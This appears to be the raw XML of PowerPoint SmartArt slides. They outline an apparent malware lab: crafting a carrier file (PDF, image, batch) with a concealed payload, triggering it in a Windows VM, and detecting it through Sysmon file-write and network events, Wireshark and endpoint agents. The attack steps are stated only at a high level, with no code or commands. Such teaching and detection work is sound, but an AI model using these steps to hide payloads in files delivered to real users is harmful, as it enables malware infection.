      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{75D22D1D-B3E1-46C1-AB0B-B701DF597CC2}" type="sibTrans" cxnId="{9AB27F8D-4ECD-43EA-8590-6F92666DDD50}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{722291C7-D335-4380-9D2A-BFCA1CD88F8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File Writes</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB"/>
            <a:t> (Sysmon 11 – keylogger, startup batch)</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C43678A8-76A6-49A3-8C07-BF8178A1BCB5}" type="parTrans" cxnId="{5087CEF3-75B0-4F09-B886-BF86E1ADCD90}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C7F321E1-6A01-4035-A8A0-5BE887319E19}" type="sibTrans" cxnId="{5087CEF3-75B0-4F09-B886-BF86E1ADCD90}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{091DF448-CE1A-4AA1-AB42-92759917C96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Network Traffic</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB"/>
            <a:t> (Sysmon 3, Wireshark traces)</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EF079715-EC0B-4B58-A864-60E9926BD9D2}" type="parTrans" cxnId="{F36A113B-87A7-4B91-850C-2C629C45F5D5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8FA2AB6C-64B2-49DE-9045-21751B8335C7}" type="sibTrans" cxnId="{F36A113B-87A7-4B91-850C-2C629C45F5D5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F290097A-8C36-41E2-872C-D732D161CE16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GB" b="1"/>
            <a:t>CPU/RAM Usage</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB"/>
            <a:t> (Task Manager</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB">
              <a:latin typeface="Grandview Display"/>
            </a:rPr>
            <a:t> /process monitor </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB"/>
            <a:t>+ Defender/Bitdefender agents)</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AAAB6744-1A3D-4CE8-839F-C40431E16EE8}" type="parTrans" cxnId="{F784BD62-A64C-448C-B82F-2650E2E3EFEC}">
      <dgm:prSet/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1F4E0656-6DD7-4011-90E4-5F23D58B8706}" type="sibTrans" cxnId="{F784BD62-A64C-448C-B82F-2650E2E3EFEC}">
      <dgm:prSet/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F3CE6F3C-E559-4EDA-955A-392E870E1AE9}" type="pres">
      <dgm:prSet presAssocID="{2AEE9D9A-B8C9-4A4E-9563-E6C5E726F067}" presName="root" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{078B02BE-3A4B-4D08-873A-CE8FB4DD78BD}" type="pres">
      <dgm:prSet presAssocID="{9E749076-6CFE-4D95-9D4A-E4A372B6E382}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EC6DEB21-0160-4DD5-ACEB-2C30699C96B9}" type="pres">
      <dgm:prSet presAssocID="{9E749076-6CFE-4D95-9D4A-E4A372B6E382}" presName="bgRect" presStyleLbl="bgShp" presStyleIdx="0" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{741477F2-DB66-4CAC-B121-1065E106698D}" type="pres">
      <dgm:prSet presAssocID="{9E749076-6CFE-4D95-9D4A-E4A372B6E3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03A0725-0655-4042-B961-939B6B4399B7}" type="pres">
      <dgm:prSet presAssocID="{9E749076-6CFE-4D95-9D4A-E4A372B6E382}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1F26AD78-55E8-4B6E-B57B-029A79973393}" type="pres">
      <dgm:prSet presAssocID="{9E749076-6CFE-4D95-9D4A-E4A372B6E382}" presName="parTx" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{832FB04B-7459-4259-ABE1-1B6244179875}" type="pres">
      <dgm:prSet presAssocID="{75D22D1D-B3E1-46C1-AB0B-B701DF597CC2}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4D9A4877-40BE-439A-A86C-7CAAFD91DEE7}" type="pres">
      <dgm:prSet presAssocID="{722291C7-D335-4380-9D2A-BFCA1CD88F8C}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B6EF7419-B15C-44E2-8F87-460CFCCF1016}" type="pres">
      <dgm:prSet presAssocID="{722291C7-D335-4380-9D2A-BFCA1CD88F8C}" presName="bgRect" presStyleLbl="bgShp" presStyleIdx="1" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{94345BA1-1E08-4D82-B86A-85D1BA50C6DC}" type="pres">
      <dgm:prSet presAssocID="{722291C7-D335-4380-9D2A-BFCA1CD88F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5389E9C5-3076-4C1B-AB53-A8F0EC1514D3}" type="pres">
      <dgm:prSet presAssocID="{722291C7-D335-4380-9D2A-BFCA1CD88F8C}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8C7296E6-E00C-4DCF-9146-26F9A73B5BBF}" type="pres">
      <dgm:prSet presAssocID="{722291C7-D335-4380-9D2A-BFCA1CD88F8C}" presName="parTx" presStyleLbl="revTx" presStyleIdx="1" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F87F83D0-0DE8-4310-974E-F17DAB3E939C}" type="pres">
      <dgm:prSet presAssocID="{C7F321E1-6A01-4035-A8A0-5BE887319E19}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{590CEE97-6C8C-42E1-810D-1261072B9866}" type="pres">
      <dgm:prSet presAssocID="{091DF448-CE1A-4AA1-AB42-92759917C960}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8FAB0DE5-281E-4722-B50C-5D68152EBC8B}" type="pres">
      <dgm:prSet presAssocID="{091DF448-CE1A-4AA1-AB42-92759917C960}" presName="bgRect" presStyleLbl="bgShp" presStyleIdx="2" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{DC112A3C-6367-482C-99C2-9F844DA3BA3F}" type="pres">
      <dgm:prSet presAssocID="{091DF448-CE1A-4AA1-AB42-92759917C9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83872CAC-3DCC-404A-B61E-CE85EF436D9B}" type="pres">
      <dgm:prSet presAssocID="{091DF448-CE1A-4AA1-AB42-92759917C960}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{16994310-0E06-4BFD-9385-ED9A2E609938}" type="pres">
      <dgm:prSet presAssocID="{091DF448-CE1A-4AA1-AB42-92759917C960}" presName="parTx" presStyleLbl="revTx" presStyleIdx="2" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{11BF77E7-235C-45FC-AA9F-C7E7038E40E5}" type="pres">
      <dgm:prSet presAssocID="{8FA2AB6C-64B2-49DE-9045-21751B8335C7}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{928F9462-62F9-4206-9AAA-7C9AE2C270C0}" type="pres">
      <dgm:prSet presAssocID="{F290097A-8C36-41E2-872C-D732D161CE16}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C73F2399-6EE1-4167-825D-43FDFB6E702A}" type="pres">
      <dgm:prSet presAssocID="{F290097A-8C36-41E2-872C-D732D161CE16}" presName="bgRect" presStyleLbl="bgShp" presStyleIdx="3" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F4DF0C03-8459-4FF6-90D7-3116486AE075}" type="pres">
      <dgm:prSet presAssocID="{F290097A-8C36-41E2-872C-D732D161CE16}" presName="iconRect" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4D5AED0A-AB88-41AE-90C5-A5F03AC9DEC7}" type="pres">
      <dgm:prSet presAssocID="{F290097A-8C36-41E2-872C-D732D161CE16}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{679200E5-11D0-405F-9C51-8DD619B9DCC1}" type="pres">
      <dgm:prSet presAssocID="{F290097A-8C36-41E2-872C-D732D161CE1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5286A10-8B86-4E23-B150-28F987918813}" type="presOf" srcId="{9E749076-6CFE-4D95-9D4A-E4A372B6E382}" destId="{1F26AD78-55E8-4B6E-B57B-029A79973393}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{EE345C33-9888-462A-8165-ECA7F8F1505B}" type="presOf" srcId="{F290097A-8C36-41E2-872C-D732D161CE16}" destId="{679200E5-11D0-405F-9C51-8DD619B9DCC1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{F36A113B-87A7-4B91-850C-2C629C45F5D5}" srcId="{2AEE9D9A-B8C9-4A4E-9563-E6C5E726F067}" destId="{091DF448-CE1A-4AA1-AB42-92759917C960}" srcOrd="2" destOrd="0" parTransId="{EF079715-EC0B-4B58-A864-60E9926BD9D2}" sibTransId="{8FA2AB6C-64B2-49DE-9045-21751B8335C7}"/>
    <dgm:cxn modelId="{C6E1DB3D-1A12-4826-B900-4F9E4EB06728}" type="presOf" srcId="{2AEE9D9A-B8C9-4A4E-9563-E6C5E726F067}" destId="{F3CE6F3C-E559-4EDA-955A-392E870E1AE9}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{F784BD62-A64C-448C-B82F-2650E2E3EFEC}" srcId="{2AEE9D9A-B8C9-4A4E-9563-E6C5E726F067}" destId="{F290097A-8C36-41E2-872C-D732D161CE16}" srcOrd="3" destOrd="0" parTransId="{AAAB6744-1A3D-4CE8-839F-C40431E16EE8}" sibTransId="{1F4E0656-6DD7-4011-90E4-5F23D58B8706}"/>
    <dgm:cxn modelId="{9AB27F8D-4ECD-43EA-8590-6F92666DDD50}" srcId="{2AEE9D9A-B8C9-4A4E-9563-E6C5E726F067}" destId="{9E749076-6CFE-4D95-9D4A-E4A372B6E382}" srcOrd="0" destOrd="0" parTransId="{2BA46C1E-0699-484E-B570-4F05BC3129F7}" sibTransId="{75D22D1D-B3E1-46C1-AB0B-B701DF597CC2}"/>
    <dgm:cxn modelId="{14C929C5-A194-4987-AD7E-5BC510B3E6FA}" type="presOf" srcId="{722291C7-D335-4380-9D2A-BFCA1CD88F8C}" destId="{8C7296E6-E00C-4DCF-9146-26F9A73B5BBF}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{112DBAC6-ADA6-4859-87B1-E2C94BE97439}" type="presOf" srcId="{091DF448-CE1A-4AA1-AB42-92759917C960}" destId="{16994310-0E06-4BFD-9385-ED9A2E609938}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{5087CEF3-75B0-4F09-B886-BF86E1ADCD90}" srcId="{2AEE9D9A-B8C9-4A4E-9563-E6C5E726F067}" destId="{722291C7-D335-4380-9D2A-BFCA1CD88F8C}" srcOrd="1" destOrd="0" parTransId="{C43678A8-76A6-49A3-8C07-BF8178A1BCB5}" sibTransId="{C7F321E1-6A01-4035-A8A0-5BE887319E19}"/>
    <dgm:cxn modelId="{82C3182B-B8FA-498D-9CB2-D8AA42E6135C}" type="presParOf" srcId="{F3CE6F3C-E559-4EDA-955A-392E870E1AE9}" destId="{078B02BE-3A4B-4D08-873A-CE8FB4DD78BD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{93AE7357-D8B5-4264-AA55-F0BF1787000D}" type="presParOf" srcId="{078B02BE-3A4B-4D08-873A-CE8FB4DD78BD}" destId="{EC6DEB21-0160-4DD5-ACEB-2C30699C96B9}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{BDFF7D2C-0A03-407C-940D-AD34900A9FDE}" type="presParOf" srcId="{078B02BE-3A4B-4D08-873A-CE8FB4DD78BD}" destId="{741477F2-DB66-4CAC-B121-1065E106698D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{B07971DB-C930-4EEC-97AB-40FE69D5CF37}" type="presParOf" srcId="{078B02BE-3A4B-4D08-873A-CE8FB4DD78BD}" destId="{803A0725-0655-4042-B961-939B6B4399B7}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{1319F84B-DBA6-46CA-9A2B-26F9FD35B066}" type="presParOf" srcId="{078B02BE-3A4B-4D08-873A-CE8FB4DD78BD}" destId="{1F26AD78-55E8-4B6E-B57B-029A79973393}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{2199ECE1-282A-46A7-91BB-0898130A6CA5}" type="presParOf" srcId="{F3CE6F3C-E559-4EDA-955A-392E870E1AE9}" destId="{832FB04B-7459-4259-ABE1-1B6244179875}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{C9ABDC90-5ADA-4E7A-99BF-5BBF80691430}" type="presParOf" srcId="{F3CE6F3C-E559-4EDA-955A-392E870E1AE9}" destId="{4D9A4877-40BE-439A-A86C-7CAAFD91DEE7}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{BBE92B14-D2BE-4D28-86C7-E8A548AB1D6B}" type="presParOf" srcId="{4D9A4877-40BE-439A-A86C-7CAAFD91DEE7}" destId="{B6EF7419-B15C-44E2-8F87-460CFCCF1016}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{3BA63BAA-5955-443C-9363-6DF389599F08}" type="presParOf" srcId="{4D9A4877-40BE-439A-A86C-7CAAFD91DEE7}" destId="{94345BA1-1E08-4D82-B86A-85D1BA50C6DC}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{B7A0B9AA-1FFD-44A7-B77C-5C6498B45FCA}" type="presParOf" srcId="{4D9A4877-40BE-439A-A86C-7CAAFD91DEE7}" destId="{5389E9C5-3076-4C1B-AB53-A8F0EC1514D3}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{417EF0E0-56FA-4D02-9125-CBEC487E5162}" type="presParOf" srcId="{4D9A4877-40BE-439A-A86C-7CAAFD91DEE7}" destId="{8C7296E6-E00C-4DCF-9146-26F9A73B5BBF}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{DF4DD82E-14F9-456F-A341-4231B2B282D7}" type="presParOf" srcId="{F3CE6F3C-E559-4EDA-955A-392E870E1AE9}" destId="{F87F83D0-0DE8-4310-974E-F17DAB3E939C}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{F2D60F6A-FBFA-4062-B76F-C30FEAAD875D}" type="presParOf" srcId="{F3CE6F3C-E559-4EDA-955A-392E870E1AE9}" destId="{590CEE97-6C8C-42E1-810D-1261072B9866}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{ADE1B47D-B78B-4CAD-8322-9F48DEED21AD}" type="presParOf" srcId="{590CEE97-6C8C-42E1-810D-1261072B9866}" destId="{8FAB0DE5-281E-4722-B50C-5D68152EBC8B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{E74ED03D-5781-4A88-AE56-4A1F09E0CEBD}" type="presParOf" srcId="{590CEE97-6C8C-42E1-810D-1261072B9866}" destId="{DC112A3C-6367-482C-99C2-9F844DA3BA3F}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{5D05E38C-5212-483C-B483-B1B4DEF0EDCD}" type="presParOf" srcId="{590CEE97-6C8C-42E1-810D-1261072B9866}" destId="{83872CAC-3DCC-404A-B61E-CE85EF436D9B}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{6C5ED616-10A2-428E-942B-153D6BC711B0}" type="presParOf" srcId="{590CEE97-6C8C-42E1-810D-1261072B9866}" destId="{16994310-0E06-4BFD-9385-ED9A2E609938}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{F33B8B35-8BB2-4717-BCFA-966FE9464BD0}" type="presParOf" srcId="{F3CE6F3C-E559-4EDA-955A-392E870E1AE9}" destId="{11BF77E7-235C-45FC-AA9F-C7E7038E40E5}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{34900B03-8C5A-4197-B899-2AB4F67D2B81}" type="presParOf" srcId="{F3CE6F3C-E559-4EDA-955A-392E870E1AE9}" destId="{928F9462-62F9-4206-9AAA-7C9AE2C270C0}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{B605F861-83BF-49D3-8607-AD8EDE25F375}" type="presParOf" srcId="{928F9462-62F9-4206-9AAA-7C9AE2C270C0}" destId="{C73F2399-6EE1-4167-825D-43FDFB6E702A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{611C06ED-0B5D-4E0B-A147-51891235BB57}" type="presParOf" srcId="{928F9462-62F9-4206-9AAA-7C9AE2C270C0}" destId="{F4DF0C03-8459-4FF6-90D7-3116486AE075}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{956ECAE4-3769-46AE-BC7C-B037ACA7639A}" type="presParOf" srcId="{928F9462-62F9-4206-9AAA-7C9AE2C270C0}" destId="{4D5AED0A-AB88-41AE-90C5-A5F03AC9DEC7}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{F481BD97-A8E0-446B-865A-A7ED7833B30A}" type="presParOf" srcId="{928F9462-62F9-4206-9AAA-7C9AE2C270C0}" destId="{679200E5-11D0-405F-9C51-8DD619B9DC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1A59C5-508B-4D37-8970-86934CE8B063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4A2DB8-E9F9-4591-BFB3-8F5369CF958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>
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="76000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>Generate / Embed</a:t>
          </a:r>
          <a:endParaRPr lang="en-US">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="76000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1255A902-60C2-4D3D-AD54-9F77CDE23982}" type="parTrans" cxnId="{C93337B0-F126-469F-9155-85D259332C2B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{15CE1D2F-C46C-4047-A7C1-0E3507832763}" type="sibTrans" cxnId="{C93337B0-F126-469F-9155-85D259332C2B}">
      <dgm:prSet phldrT="1" phldr="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{44116EE5-ED27-483F-B5A0-37EA47C1B06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accent1">
                  <a:lumMod val="76000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>Craft a carrier file (e.g., PDF, image, batch) and embed a concealed command or payload.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="76000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EF993A15-ECF6-4E52-95DE-CF522F71212D}" type="parTrans" cxnId="{DA4214C6-7774-477C-AAFF-6736C5B63846}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F5C83A1A-3056-4851-AC6A-26729D5F5759}" type="sibTrans" cxnId="{DA4214C6-7774-477C-AAFF-6736C5B63846}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9F974960-1C41-4170-89F5-DC39F857A04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>
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="76000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>Download &amp; Execute</a:t>
          </a:r>
          <a:endParaRPr lang="en-US">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="76000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7477B173-0759-4495-B0C7-CCE36FDE439F}" type="parTrans" cxnId="{220807F3-CF90-4D74-91BD-B31266054754}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{934DCF3A-DF7A-458A-B855-E21B6A2044DB}" type="sibTrans" cxnId="{220807F3-CF90-4D74-91BD-B31266054754}">
      <dgm:prSet phldrT="2" phldr="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A422B350-6283-41E5-AFAF-D8E4584C127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accent1">
                  <a:lumMod val="76000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>Transfer the file to a Windows VM and trigger execution (double-click, macro, or script).</a:t>
          </a:r>
          <a:endParaRPr lang="en-US">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="76000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E474FEFD-0B77-42ED-897B-F1FF729AD9C3}" type="parTrans" cxnId="{1B43CA40-91FE-4DA3-8D71-9752BD4C07F3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DD4F6AA4-CAC5-4F89-84ED-0D4F63D7323D}" type="sibTrans" cxnId="{1B43CA40-91FE-4DA3-8D71-9752BD4C07F3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9D136766-8B73-4AC3-A32B-32A2F620FA20}" type="pres">
      <dgm:prSet presAssocID="{3A1A59C5-508B-4D37-8970-86934CE8B063}" presName="root" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BA491D36-CA9D-4EB0-81E3-33934CE0A9DC}" type="pres">
      <dgm:prSet presAssocID="{304A2DB8-E9F9-4591-BFB3-8F5369CF9580}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C5336850-DBAC-4B94-BEB0-4F2942919D1D}" type="pres">
      <dgm:prSet presAssocID="{304A2DB8-E9F9-4591-BFB3-8F5369CF95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CE17BFB-33F3-4349-8F1E-CDD64B759A79}" type="pres">
      <dgm:prSet presAssocID="{304A2DB8-E9F9-4591-BFB3-8F5369CF9580}" presName="iconSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3AB7C1B2-083C-4211-8E6E-BAE42BD95EC8}" type="pres">
      <dgm:prSet presAssocID="{304A2DB8-E9F9-4591-BFB3-8F5369CF9580}" presName="parTx" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7296A0EA-12AA-42AF-9B14-96775FB23DE4}" type="pres">
      <dgm:prSet presAssocID="{304A2DB8-E9F9-4591-BFB3-8F5369CF9580}" presName="txSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0530AC03-97A1-40A4-BB60-95F79788777B}" type="pres">
      <dgm:prSet presAssocID="{304A2DB8-E9F9-4591-BFB3-8F5369CF9580}" presName="desTx" presStyleLbl="revTx" presStyleIdx="1" presStyleCnt="4">
        <dgm:presLayoutVars/>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7038B92C-2FC2-4789-B800-C6D176458155}" type="pres">
      <dgm:prSet presAssocID="{15CE1D2F-C46C-4047-A7C1-0E3507832763}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FE1CD304-34E7-4C0E-99F4-0917B444065C}" type="pres">
      <dgm:prSet presAssocID="{9F974960-1C41-4170-89F5-DC39F857A040}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
